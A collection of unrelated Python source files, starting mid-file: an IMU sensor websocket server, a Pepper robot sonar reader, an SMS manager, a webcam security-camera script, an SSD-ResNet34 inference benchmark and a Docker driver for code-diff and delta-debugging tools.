self.error_thread = threading.Thread(target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
self.children_pids.append(pid)
def error_listener(self):
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = "\n\n-- Tracebacks above this line can probably be ignored --\n\n"
msg += original_trace
raise Exception(msg)
if __name__ == '__main__':
parser = options.get_training_parser()
args = options.parse_args_and_arch(parser)
main(args)
|
server.py
|
import asyncio
import json
import re
from itertools import cycle
from threading import Thread
from time import sleep
import serial
from aiohttp import web
from scipy import signal
class Sensor:
# Serial message patterns.
re_patterns = [
r'(RPY) - Roll: (-?\d+) \| Pitch: (-?\d+) \| Yaw: (-?\d+)',
r'(ACC) - x: (-?\d+) \| y: (-?\d+) \| z: (-?\d+)',
r'(GYR) - x: (-?\d+) \| y: (-?\d+) \| z: (-?\d+)',
r'(MAG) - x: (-?\d+) \| y: (-?\d+) \| z: (-?\d+)',
]
def __init__(self, port='COM4', history=None):
self._port = port
self._close = False
self._indexes = {
'RPY': 0,
'ACC': 0,
'GYR': 0,
'MAG': 0,
}
if history is not None:
self._history = history
self._thread = None
else:
self._history = {
'RPY': [],
'ACC': [],
'GYR': [],
'MAG': [],
}
self._thread = Thread(target=self._update)
self._thread.start()
def _update(self):
self._ser = serial.Serial(self._port, 115200, timeout=0.1)
self._ser.readline() # primer reading x2
self._ser.readline()
temp = {}
while not self._close:
while True:
try:
line = self._ser.readline().decode()
except UnicodeDecodeError:
# Truncated unicode may appear when the program just starts.
continue
else:
break
if line.startswith('END') and len(temp) == 4:
for k, v in temp.items():
self._history[k].append(v)
temp = {}
else:
for pattern in self.re_patterns:
match = re.search(pattern, line)
t = []
if match:
if match.group(1) == 'RPY':
for i in range(2, 5):
v = float(match.group(i)) / 100
t.append(v)
t[1] = -t[1] # pitch is reversed.
elif match.group(1) == 'ACC':
for i in range(2, 5):
v = -float(match.group(i)) / (65536 / 2) * 2 # So do ACC
t.append(v)
elif match.group(1) == 'GYR':
for i in range(2, 5):
v = float(match.group(i)) / (65536 / 2) * 2000
t.append(v)
elif match.group(1) == 'MAG':
for i in range(2, 5):
v = float(match.group(i)) * 0.15
t.append(v)
temp[match.group(1)] = t
break
def next(self, key):
'''Get the next data point, and block until data are ready.'''
key = key.upper()
index = self._indexes[key]
seq = self._history[key]
while index >= len(seq):
sleep(0.05)
self._indexes[key] = index + 1
return seq[index]
def save(self, path):
with open(path, encoding='utf-8', mode='w') as file:
json.dump(self._history, file)
def close(self):
self._close = True
while self._thread and self._thread.is_alive():
sleep(0.1)
async def mock_display_handler(request):
'''For testing when the board is not connected.'''
roll = cycle(range(10, 100, 10))
pitch = cycle(range(10, 100, 10))
yaw = cycle(range(10, 100, 10))
ws = web.WebSocketResponse()
await ws.prepare(request)
while True:
try:
await ws.receive(timeout=0.01)
except asyncio.TimeoutError:
sleep(0.5)
# await ws.send_json([next(roll), next(pitch), next(yaw)])
await ws.send_json([29.89, 55.37, 10.97])
else:
break
return ws
async def display_handler(request):
'''Handler for AH'''
ws = web.WebSocketResponse()
await ws.prepare(request)
sensor = Sensor()
while True:
try:
await ws.receive(timeout=0.01)
except asyncio.TimeoutError:
await ws.send_json(sensor.next('RPY'))
else:
break
if request.app['files']['save_file'] != 'None':
sensor.save(request.app['files']['save_file'])
sensor.close()
return ws
async def analyse_handler(request):
'''Handler for charts'''
param = await request.json()
name = param['name']
order = param['order']
freq = param['freq']
with open(request.app['files']['history_file'], encoding='utf-8') as file:
history = json.load(file)
data = history[name]
# Filter
if order != 'None':
b, a = signal.butter(int(order), freq, 'lowpass')
data_x = [v[0] for v in data]
data_y = [v[1] for v in data]
data_z = [v[2] for v in data]
data_x = signal.filtfilt(b, a, data_x)
data_y = signal.filtfilt(b, a, data_y)
data_z = signal.filtfilt(b, a, data_z)
data = [[v_x, v_y, v_z] for v_x, v_y, v_z in zip(data_x, data_y, data_z)]
return web.json_response(data)
async def path_handler(request):
'''Receive paths to history json.'''
path_obj = await request.json()
if 'display' in path_obj:
if path_obj['display'] == 'None':
app['files']['save_file'] = path_obj['display']
text = 'ACK'
else:
try:
with open(path_obj['display'], encoding='utf-8', mode='w') as _:
app['files']['save_file'] = path_obj['display']
except Exception as exc:
text = repr(exc)
else:
text = 'ACK'
elif 'analyse' in path_obj:
try:
with open(path_obj['analyse'], encoding='utf-8') as _:
app['files']['history_file'] = path_obj['analyse']
except Exception as exc:
text = repr(exc)
else:
text = 'ACK'
else:
text = 'Invalid path type!'
return web.Response(text=text)
app = web.Application()
app['files'] = {
'save_file': None,
'history_file': None,
}
app.add_routes([
web.get('/display', mock_display_handler),
# web.get('/display', display_handler),
web.post('/analyse', analyse_handler),
web.post('/path', path_handler),
web.static('/', './static'),
])
web.run_app(app)
|
getsonar.py
|
#http://doc.aldebaran.com/2-5/naoqi/core/almemory-api.html
#http://doc.aldebaran.com/2-5/family/pepper_technical/pepper_dcm/actuator_sensor_names.html#ju-sonars
import qi
import argparse
import sys
import time
import threading
sonarValueList = ["Device/SubDeviceList/Platform/Front/Sonar/Sensor/Value",
"Device/SubDeviceList/Platform/Back/Sonar/Sensor/Value"]
import threading
import os
def rhMonitorThread (memory_service):
t = threading.currentThread()
while getattr(t, "do_run", True):
sonarValues = memory_service.getListData(sonarValueList)
print "[Front, Back]", sonarValues
time.sleep(1)
print "Exiting Thread"
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--pip", type=str, default=os.environ['PEPPER_IP'],
help="Robot IP address. On robot or Local Naoqi: use '127.0.0.1'.")
parser.add_argument("--pport", type=int, default=9559,
help="Naoqi port number")
args = parser.parse_args()
pip = args.pip
pport = args.pport
#Starting application
try:
connection_url = "tcp://" + pip + ":" + str(pport)
app = qi.Application(["SonarReader", "--qi-url=" + connection_url ])
except RuntimeError:
print ("Can't connect to Naoqi at ip \"" + pip + "\" on port " + str(pport) +".\n"
"Please check your script arguments. Run with -h option for help.")
sys.exit(1)
app.start()
session = app.session
#Starting services
memory_service = session.service("ALMemory")
#create a thead that monitors directly the signal
monitorThread = threading.Thread(target = rhMonitorThread, args = (memory_service,))
monitorThread.start()
#Program stays at this point until we stop it
app.run()
monitorThread.do_run = False
print "Finished"
if __name__ == "__main__":
main()
|
pysms.py
|
from threading import Thread
from multiprocessing import Pool
from datetime import datetime
def join_threads(threads):
for t in threads:
t.join()
class ApiRequestError(Exception):
def __init__(self, message):
super().__init__(message)
class DeviceManager():
def __init__(self, identifier):
self.current = None
self.identifier = identifier
self.devices = {}
def add_device(self, **kwargs):
self.devices[kwargs[self.identifier]] = kwargs
self.current = kwargs[self.identifier]
def switch_device(self, id):
try:
self.current = self.devices[id]
except KeyError:
raise KeyError('Device {} not in added devices'.format(id))
def send_all(self, message):
if self.service == 'verizon':
self.send_sms(message, [i[self.identifier] for i in self.devices])
return
_threads = []
for device in self.devices:
t = Thread(target=self.send_sms, args=(message, device))
_threads.append(t)
t.start()
t = Thread(target=join_threads, args=(_threads, ))
t.start()
def read_all(self, time=datetime.now().date()):
_times = [time] * len(self.devices)
_threads = []
_history = Pool(self.get_sms_history, args=(self.devices, _times))
sms_history = {}
for dev, msg, in zip(self.devices, _history):
sms_history[dev] = msg
return sms_history
|
socket_handler.py
|
import threading
import websocket
import json
import logging
logging.basicConfig()
class SocketHandler(threading.Thread):
def __init__(self, host, send_q, recv_q, debug=False, sentinel=None):
super(SocketHandler, self).__init__()
self.debug = debug
self.send_q = send_q
self.recv_q = recv_q
self._sentinel = sentinel
self.ready = False
def on_message(ws, message):
self.recv_q.put(json.loads(message))
logging.debug(message)
def on_error(ws, error):
logging.error(error)
ws.close()
def on_close(ws, close_status_code, close_msg):
# TODO: implement reconnection strategy
pass
def on_open(ws):
self.ready = True;
self.ws = websocket.WebSocketApp('ws://%s:8899/websocket' % host,
on_message = on_message,
on_error = on_error,
on_close = on_close,
on_open = on_open)
# Run the WebSocket handler in its own thread
def run_ws():
self.ws.run_forever()
threading.Thread(target=run_ws).start()
if (self.debug):
print('opened socket to %s:%d' % (host, 8899))
def run(self):
while True:
# Pull new messages to send off the queue
if self.send_q.qsize() > 0 and self.ready == True:
msg = self.send_q.get()
# Check if we're being told to shut down
if msg is self._sentinel:
self.ws.close()
break
if self.debug: print("Tx: " + json.dumps(msg))
msg_to_send = json.dumps(msg) + "\r\n"
# Send the message
self.ws.send(msg_to_send)
self.send_q.task_done()
|
__main__.py
|
"""
A security camera on computer using webcam.
"""
from datetime import datetime
from multiprocessing import Process, cpu_count
import os
import security_webcam as sw
def main():
""" Main Loop """
args = sw.parse_inputs()
print(f"Settings >>> top fps: {args.fps}, recording length: {args.max_len} minutes")
sw.utils.log_event('start')
sw.utils.create_vid_dir(args.output)
cc = sw.CameraControl(fps=args.fps, temp_buffer_len=args.temp_buffer_len,
vid_buffer_len=args.vid_buffer_len, max_len=args.max_len,
show_cam=args.show, show_time=args.time)
cc.start_cam()
input(">>> Press Enter to start recording...")
while True:
if args.verbose: print("Recording...")
sw.utils.log_event('recording')
bufs, frame_size, real_fps = cc.start_recording(verbose=args.verbose)
if args.verbose: print("Saving footage...")
sw.utils.log_event('save')
filename = os.path.join(args.output, str(datetime.today()) + '.mov')
p = Process(target=sw.utils.output_vid, args=(filename, bufs, real_fps, frame_size))
p.start()
sw.utils.log_event('exit')
cc.close_cam()
if __name__ == "__main__":
main()
|
infer_tb.py
|
#
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
### This file is originally from: [mlcommons repo](https://github.com/mlcommons/inference/tree/r0.5/others/cloud/single_stage_detector/pytorch/infer.py)
import os
from argparse import ArgumentParser
from re import M
from utils import DefaultBoxes, Encoder, COCODetection
from base_model import Loss
from utils import SSDTransformer
from ssd_r34 import SSD_R34
import torch
from torch.autograd import Variable
from torch.utils.data import DataLoader
import time
import numpy as np
import torch.nn as nn
from torch.utils import ThroughputBenchmark
import threading
import torch.fx.experimental.optimization as optimization
use_ipex = False
if os.environ.get('USE_IPEX') == "1":
import intel_extension_for_pytorch as ipex
use_ipex = True
def parse_args():
parser = ArgumentParser(description="Train Single Shot MultiBox Detector"
" on COCO")
parser.add_argument('--data', '-d', type=str, default='../coco',
help='path to test and training data files')
parser.add_argument('--no-cuda', action='store_true',
help='use available GPUs')
parser.add_argument('--seed', '-s', type=int,
help='manually set random seed for torch')
parser.add_argument('--device', '-did', type=int,
help='device id')
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--batch-size', '-b', type=int, default=32,
help='set batch size of valuation, default is 32')
parser.add_argument('--iteration', '-iter', type=int, default=None,
help='set the iteration of inference, default is None')
parser.add_argument('-p', '--print-freq', default=10, type=int,
metavar='N', help='print frequency (default: 10)')
parser.add_argument('--threshold', '-t', type=float, default=0.20,
help='stop training early at threshold')
parser.add_argument('--checkpoint', type=str, default='',
help='path to model checkpoint file, default is None')
parser.add_argument('--image-size', default=[1200,1200], type=int, nargs='+',
help='input image sizes (e.g 1400 1400,1200 1200')
parser.add_argument('--strides', default=[3,3,2,2,2,2], type=int, nargs='+',
help='stides for ssd model must include 6 numbers')
parser.add_argument('--use-fp16', action='store_true')
parser.add_argument('--ipex', action='store_true', default=False,
help='use intel pytorch extension')
parser.add_argument('--int8', action='store_true', default=False,
help='enable ipex int8 path')
parser.add_argument('--jit', action='store_true', default=False,
help='enable ipex jit path')
parser.add_argument('--calibration', action='store_true', default=False,
help='doing int8 calibration step')
parser.add_argument('--configure', default='configure.json', type=str, metavar='PATH',
help='path to int8 configures, default file name is configure.json')
parser.add_argument("--dummy", action='store_true',
help="using dummu data to test the performance of inference")
parser.add_argument('-w', '--warmup-iterations', default=0, type=int, metavar='N',
help='number of warmup iterations to run')
parser.add_argument('--autocast', action='store_true', default=False,
help='enable autocast')
parser.add_argument('--profile', action='store_true', default=False,
help='enable profile')
parser.add_argument('--number-instance', default=7, type=int,
help='the instance number for throughput benchmark')
parser.add_argument('--use-throughput-benchmark', action='store_true', default=False,
help='use throughput benchmark')
return parser.parse_args()
def show_memusage(device=0):
import gpustat
gpu_stats = gpustat.GPUStatCollection.new_query()
item = gpu_stats.jsonify()["gpus"][device]
print("{}/{}".format(item["memory.used"], item["memory.total"]))
class ProgressMeter(object):
def __init__(self, num_batches, meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def display(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
class SSD_R34_NMS(nn.Module):
def __init__(self, model = None, encoder = None):
super(SSD_R34_NMS, self).__init__()
assert model is not None
assert encoder is not None
self.model = model
self.encoder = encoder
def forward(self, img):
ploc, plabel = self.model(img)
results = self.encoder.decode_batch(ploc, plabel, 0.5, 200, 0)
return results
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
def dboxes_R34_coco(figsize,strides):
ssd_r34=SSD_R34(81,strides=strides)
synt_img=torch.rand([1,3]+figsize)
_,_,feat_size =ssd_r34(synt_img, extract_shapes = True)
steps=[(int(figsize[0]/fs[0]),int(figsize[1]/fs[1])) for fs in feat_size]
# use the scales here: https://github.com/amdegroot/ssd.pytorch/blob/master/data/config.py
scales = [(int(s*figsize[0]/300),int(s*figsize[1]/300)) for s in [21, 45, 99, 153, 207, 261, 315]]
aspect_ratios = [[2], [2, 3], [2, 3], [2, 3], [2], [2]]
dboxes = DefaultBoxes(figsize, feat_size, steps, scales, aspect_ratios)
return dboxes
def coco_eval(model, val_dataloader, cocoGt, encoder, inv_map, args):
from pycocotools.cocoeval import COCOeval
device = args.device
threshold = args.threshold
use_cuda = not args.no_cuda and torch.cuda.is_available()
model.eval()
ret = []
inference_time = AverageMeter('InferenceTime', ':6.3f')
decoding_time = AverageMeter('DecodingTime', ':6.3f')
progress = ProgressMeter(
args.iteration if args.dummy else len(val_dataloader),
[inference_time, decoding_time],
prefix='Test: ')
Profilling_iterator = 99
start = time.time()
if args.int8:
model = model.eval()
model_decode = SSD_R34_NMS(model, encoder)
print('int8 conv_bn_fusion enabled')
with torch.no_grad():
model_decode.model.model = optimization.fuse(model_decode.model.model, inplace=False)
if args.calibration:
print("runing int8 LLGA calibration step not support in throughput benchmark")
else:
print("INT8 LLGA start trace")
# insert quant/dequant based on configure.json
conf = ipex.quantization.QuantConf(configure_file=args.configure)
model_decode.eval()
model_decode = ipex.quantization.convert(model_decode, conf, torch.randn(args.batch_size, 3, 1200, 1200))
print("done ipex default recipe.......................")
# freeze the module
# model = torch.jit._recursive.wrap_cpp_module(torch._C._freeze_module(model._c, preserveParameters=True))
# model_decode = torch.jit._recursive.wrap_cpp_module(torch._C._freeze_module(model_decode._c, preserveParameters=True))
# After freezing, run 1 time to warm up the profiling graph executor to insert prim::profile
# At the 2nd run, the llga pass will be triggered and the model is turned into an int8 model: prim::profile will be removed and will have LlgaFusionGroup in the graph
with torch.no_grad():
for i in range(2):
# _ = model_decode(torch.randn(args.batch_size, 3, 1200, 1200).to(memory_format=torch.channels_last))
_ = model_decode(torch.randn(args.batch_size, 3, 1200, 1200))
if args.use_throughput_benchmark:
print('runing int8 real inputs inference use_throughput_benchmark path')
bench = ThroughputBenchmark(model_decode)
for nbatch, (img, img_id, img_size, bbox, label) in enumerate(val_dataloader):
#bench.add_input(img.to(memory_format=torch.channels_last))
bench.add_input(img)
if nbatch == args.iteration:
break
if args.profile:
print("Profilling")
with torch.profiler.profile(on_trace_ready=torch.profiler.tensorboard_trace_handler("./int8_log")) as prof:
# ploc, plabel = model(img)
print("start to running the benchmark")
print(args.number_instance)
stats = bench.benchmark(num_calling_threads=args.number_instance, num_warmup_iters=args.warmup_iterations, num_iters=args.iteration) #num_instance, warm up iters, total iters
# print(prof.key_averages().table(sort_by="self_cpu_time_total"))
else:
# ploc, plabel = model(img)
with torch.no_grad():
print("start to running the benchmark")
print(args.number_instance)
stats = bench.benchmark(num_calling_threads=args.number_instance, num_warmup_iters=args.warmup_iterations, num_iters=args.iteration) #num_instance, warm up iters, total iters
else:
print('runing int8 real inputs inference pthread weight sharing path')
def run_model(m, tid):
time_consume = 0
with torch.no_grad():
for nbatch, (img, img_id, img_size, bbox, label) in enumerate(val_dataloader):
if nbatch > args.warmup_iterations:
start_time=time.time()
#m(img.to(memory_format=torch.channels_last))
m(img)
if nbatch > args.warmup_iterations:
time_consume += time.time() - start_time
if nbatch == args.iteration:
fps = (args.iteration - args.warmup_iterations) / time_consume
avg_time = time_consume * 1000 / (args.iteration - args.warmup_iterations)
print('Instance num: %d Avg Time/Iteration: %f msec Throughput: %f fps' %(tid, avg_time, fps))
break
threads = []
for i in range(1, args.number_instance+1):
thread = threading.Thread(target=run_model, args=(model_decode, i))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
exit()
else:
if args.dummy:
print('dummy inputs inference path is not supported')
else:
print('runing real inputs path')
model_decode = SSD_R34_NMS(model, encoder)
if args.autocast:
print('bf16 autocast enabled')
print('enable nhwc')
# model = model.to(memory_format=torch.channels_last)
model_decode.model = model_decode.model.to(memory_format=torch.channels_last)
if use_ipex:
print('bf16 block format weights cache enabled')
# model.model = ipex.optimize(model.model, dtype=torch.bfloat16, level='O0')
model_decode.model.model = ipex.optimize(model_decode.model.model, dtype=torch.bfloat16, inplace=False)
if args.jit:
print('enable jit')
with torch.cpu.amp.autocast(), torch.no_grad():
# model = torch.jit.trace(model, torch.randn(args.batch_size, 3, 1200, 1200).to(memory_format=torch.channels_last)).eval()
model_decode = torch.jit.trace(model_decode, torch.randn(args.batch_size, 3, 1200, 1200).to(memory_format=torch.channels_last)).eval()
# model = torch.jit.freeze(model)
model_decode = torch.jit.freeze(model_decode)
if args.use_throughput_benchmark:
print('bf16 throughput benchmark')
bench = ThroughputBenchmark(model_decode)
for nbatch, (img, img_id, img_size, bbox, label) in enumerate(val_dataloader):
bench.add_input(img.to(memory_format=torch.channels_last))
if nbatch == args.iteration:
break
with torch.no_grad():
print("start to running the benchmark")
print(args.number_instance)
stats = bench.benchmark(num_calling_threads=args.number_instance, num_warmup_iters=args.warmup_iterations, num_iters=args.iteration) #num_instance, warm up iters, total iters
else:
print('bf16 pthread weight sharing path')
def run_model(m, tid):
time_consume = 0
with torch.no_grad():
for nbatch, (img, img_id, img_size, bbox, label) in enumerate(val_dataloader):
if nbatch > args.warmup_iterations:
start_time=time.time()
img = img.to(memory_format=torch.channels_last)
m(img)
if nbatch > args.warmup_iterations:
time_consume += time.time() - start_time
if nbatch == args.iteration:
fps = (args.iteration - args.warmup_iterations) / time_consume
avg_time = time_consume * 1000 / (args.iteration - args.warmup_iterations)
print('Instance num: %d Avg Time/Iteration: %f msec Throughput: %f fps' %(tid, avg_time, fps))
break
threads = []
for i in range(1, args.number_instance+1):
thread = threading.Thread(target=run_model, args=(model_decode, i))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
exit()
else:
if use_ipex:
print('Ipex Autocast imperative path in throughput benchmark not support')
else:
print("OOB Autocast imperative path in throughput benchmark not support")
exit(-1)
else:
print('autocast disabled, fp32 is used')
print('enable nhwc')
model_decode.model = model_decode.model.to(memory_format=torch.channels_last)
if use_ipex:
print('fp32 block format weights cache enabled')
model_decode.model.model = ipex.optimize(model_decode.model.model, dtype=torch.float32, inplace=False)
if args.jit:
print("enable jit")
with torch.no_grad():
model_decode = torch.jit.trace(model_decode, torch.randn(args.batch_size, 3, 1200, 1200).to(memory_format=torch.channels_last)).eval()
model_decode = torch.jit.freeze(model_decode)
if args.use_throughput_benchmark:
print('fp32 throughput benchmark')
bench = ThroughputBenchmark(model_decode)
for nbatch, (img, img_id, img_size, bbox, label) in enumerate(val_dataloader):
bench.add_input(img.to(memory_format=torch.channels_last))
if nbatch == args.iteration:
break
with torch.no_grad():
print("start to running the benchmark")
print(args.number_instance)
stats = bench.benchmark(num_calling_threads=args.number_instance, num_warmup_iters=args.warmup_iterations, num_iters=args.iteration) #num_instance, warm up iters, total iters
else:
print('fp32 pthread weight sharing path')
def run_model(m, tid):
time_consume = 0
for nbatch, (img, img_id, img_size, bbox, label) in enumerate(val_dataloader):
if nbatch > args.warmup_iterations:
start_time=time.time()
img = img.to(memory_format=torch.channels_last)
m(img)
if nbatch > args.warmup_iterations:
time_consume += time.time() - start_time
if nbatch == args.iteration:
fps = (args.iteration - args.warmup_iterations) / time_consume
avg_time = time_consume * 1000 / (args.iteration - args.warmup_iterations)
print('Instance num: %d Avg Time/Iteration: %f msec Throughput: %f fps' %(tid, avg_time, fps))
break
threads = []
for i in range(1, args.number_instance+1):
thread = threading.Thread(target=run_model, args=(model_decode, i))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
exit()
else:
print("FP32 Imperative path with weight sharing is not enabled")
exit(-1)
if args.use_throughput_benchmark:
print("Predicting Ended, total time: {:.2f} s".format(time.time()-start))
batch_size = args.batch_size
latency = stats.latency_avg_ms
perf = stats.iters_per_second * batch_size
print('inference latency %.2f ms'%latency)
print('inference performance %.2f fps'%perf)
if not args.dummy:
print("Throughput: {:.3f} fps".format(perf))
else:
total_time_avg = inference_time.avg
throughput = batch_size / total_time_avg
print("Throughput: {:.3f} fps".format(throughput))
return False
def eval_ssd_r34_mlperf_coco(args):
from coco import COCO
# Check that GPUs are actually available
use_cuda = not args.no_cuda and torch.cuda.is_available()
dboxes = dboxes_R34_coco(args.image_size, args.strides)
encoder = Encoder(dboxes)
val_trans = SSDTransformer(dboxes, (args.image_size[0], args.image_size[1]), val=True)
if not args.dummy:
val_annotate = os.path.join(args.data, "annotations/instances_val2017.json")
val_coco_root = os.path.join(args.data, "val2017")
cocoGt = COCO(annotation_file=val_annotate)
val_coco = COCODetection(val_coco_root, val_annotate, val_trans)
inv_map = {v:k for k,v in val_coco.label_map.items()}
val_dataloader = DataLoader(val_coco,
batch_size=args.batch_size,
shuffle=False,
sampler=None,
num_workers=args.workers)
labelnum = val_coco.labelnum
else:
cocoGt = None
encoder = None
inv_map = None
val_dataloader = None
labelnum = 81
ssd_r34 = SSD_R34(labelnum, strides=args.strides)
if args.checkpoint:
print("loading model checkpoint", args.checkpoint)
od = torch.load(args.checkpoint, map_location=lambda storage, loc: storage)
ssd_r34.load_state_dict(od["model"])
if use_cuda:
ssd_r34.cuda(args.device)
elif args.ipex:
ssd_r34 = ssd_r34.to(ipex.DEVICE)
coco_eval(ssd_r34, val_dataloader, cocoGt, encoder, inv_map, args)
def main():
args = parse_args()
print(args)
if not os.path.isdir('./models'):
os.mkdir('./models')
if args.seed is not None:
print("Using seed = {}".format(args.seed))
torch.manual_seed(args.seed)
np.random.seed(seed=args.seed)
if not args.no_cuda:
torch.cuda.set_device(args.device)
torch.backends.cudnn.benchmark = True
eval_ssd_r34_mlperf_coco(args)
if __name__ == "__main__":
main()
|
cca.py
|
#!/usr/bin/env python3
'''
A driver script for CCA container image
Copyright 2021 Codinuum Software Lab <https://codinuum.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import os
import sys
import time
import shutil
from datetime import datetime, timedelta
from subprocess import Popen, run
from threading import Thread
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
IMAGE_NAME = 'codecontinuum/ddj'
#IMAGE_NAME = 'ddjx'
#
CCA_HOME = '/opt/cca'
CCA_VAR = '/var/lib/cca'
CCA_LOG_DIR = '/var/log/cca'
CCA_SOURCE_DIR = CCA_VAR+'/source'
CCA_CACHE_DIR = CCA_VAR+'/cache'
CCA_WORK_DIR_NAME = '__CCA__'
CONTAINER_CMD = 'docker'
DEPENDENCIES_INSTALLER = 'install_dependencies.sh'
TIMEOUT = 5
BUFSIZE = 0 # unbuffered
STAT_NAME = 'status'
DEFAULT_CACHE_DIR = os.path.join(os.environ['HOME'], '.cca', 'cache')
#WIN_HOST_FLAG = sys.platform.startswith('win')
### timezone
TZ = None
if time.timezone != 0:
SIGN = '+' if time.timezone > 0 else '-'
STDOFFSET = timedelta(seconds=-time.timezone)
if time.daylight:
DSTOFFSET = timedelta(seconds=-time.altzone)
else:
DSTOFFSET = STDOFFSET
dt = datetime.now()
tt = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.weekday(), 0, 0)
stamp = time.mktime(tt)
tt = time.localtime(stamp)
isdst = tt.tm_isdst > 0
tzname = None
offset = 0
if isdst:
tzname = time.tzname[1]
offset = DSTOFFSET
else:
tzname = time.tzname[0]
offset = STDOFFSET
TZ = '{}{}{}'.format(tzname, SIGN, offset)
###
def progress(proc, stat_path, timeout=TIMEOUT):
stat_mtime = None
print('\nMonitoring thread started.')
while True:
try:
st = os.stat(stat_path)
if st.st_mtime != stat_mtime and st.st_size > 0:
with open(stat_path, 'r') as f:
mes = f.read()
print('[{}]'.format(mes))
stat_mtime = st.st_mtime
except OSError as e:
pass
if proc.poll() is not None:
break
proc.wait()
if proc.returncode > 0:
print('Execution failed: {}'.format(proc.returncode))
def ensure_dir(dpath):
if not os.path.isdir(dpath):
try:
os.makedirs(dpath)
except Exception as e:
raise
def get_image_name(image_name, devel=False):
suffix = ''
if devel:
suffix = ':devel'
image = image_name+suffix
return image
def run_diffast(container_cmd, original, modified, cache=DEFAULT_CACHE_DIR, clear_cache=False, view=False,
dry_run=False, devel=False, image=IMAGE_NAME, verbose=False, debug=False):
if dry_run:
verbose = True
original = os.path.abspath(original)
modified = os.path.abspath(modified)
cache = os.path.abspath(cache)
if not dry_run:
ensure_dir(cache)
cca_cmd_path = '{}/bin/{}.opt'.format(CCA_HOME, 'diffast')
cca_cmd = cca_cmd_path
if clear_cache:
cca_cmd += ' -clearcache'
cca_cmd += ' -cache {}'.format(CCA_CACHE_DIR)
orig_dir = os.path.dirname(original)
mod_dir = os.path.dirname(modified)
common_path = os.path.commonpath([orig_dir, mod_dir])
orig_path = CCA_SOURCE_DIR+'/'+os.path.relpath(original, start=common_path)
mod_path = CCA_SOURCE_DIR+'/'+os.path.relpath(modified, start=common_path)
cca_cmd += ' {} {}'.format(orig_path, mod_path)
vol_opt = '-v "{}:{}"'.format(common_path, CCA_SOURCE_DIR)
vol_opt += ' -v "{}:{}"'.format(cache, CCA_CACHE_DIR)
run_cmd = '{} run'.format(container_cmd)
run_cmd += ' --rm'
run_cmd += ' -t'
if TZ:
run_cmd += ' -e "TZ={}"'.format(TZ)
run_cmd += ' {}'.format(vol_opt)
run_cmd += ' {} {}'.format(get_image_name(image, devel=devel), cca_cmd)
if verbose:
print(run_cmd)
if not dry_run:
try:
rc = run(run_cmd, bufsize=BUFSIZE, shell=True, universal_newlines=True)
if view:
app_path = os.path.join(os.path.dirname(sys.argv[0]),
'diffviewer',
'DiffViewer-darwin-x64',
'DiffViewer.app')
if os.path.exists(app_path):
cache_opt = ' --cache {}'.format(cache)
files_opt = ' --file0 {} --file1 {}'.format(original, modified)
view_cmd = 'open -n {} --args{}{}'.format(app_path, cache_opt, files_opt)
if verbose:
print(view_cmd)
rc = run(view_cmd, shell=True)
else:
print('DiffViewer not found. See diffviewer/README.md.')
except (KeyboardInterrupt, SystemExit):
print('Interrupted.')
except OSError as e:
print('Execution failed: {}'.format(e))
def gen_work_dir_name():
dt = datetime.now()
ts = '{:04}{:02}{:02}{:02}{:02}{:02}'.format(dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second)
dn = '{}{}'.format(CCA_WORK_DIR_NAME, ts)
return dn
def run_dd(container_cmd, engine, proj_dir, v_good, v_bad, build_script='build.sh', test_script='test.sh',
proj_id=None, include=[], lang=[], algo='ddmin',
shuffle=False, greedy=False, staged=False,
dry_run=False, devel=False, image=IMAGE_NAME, verbose=True, debug=False, **kwargs):
if dry_run:
verbose = True
if proj_id == None:
proj_id = os.path.basename(proj_dir)
proj_dir = os.path.abspath(proj_dir)
work_dir = os.path.join(proj_dir, gen_work_dir_name())
print('Working directory is "{}".'.format(work_dir))
v_good_dir = os.path.join(proj_dir, v_good)
v_bad_dir = os.path.join(proj_dir, v_bad)
if not dry_run:
if os.path.exists(v_good_dir):
test_script_path = os.path.join(v_good_dir, test_script)
if not os.path.exists(test_script_path):
print('Test script not found: {}'.format(test_script_path))
else:
print('v_good not found: {}'.format(v_good_dir))
return
if not os.path.exists(v_bad_dir):
print('v_bad not found: {}'.format(v_bad_dir))
return
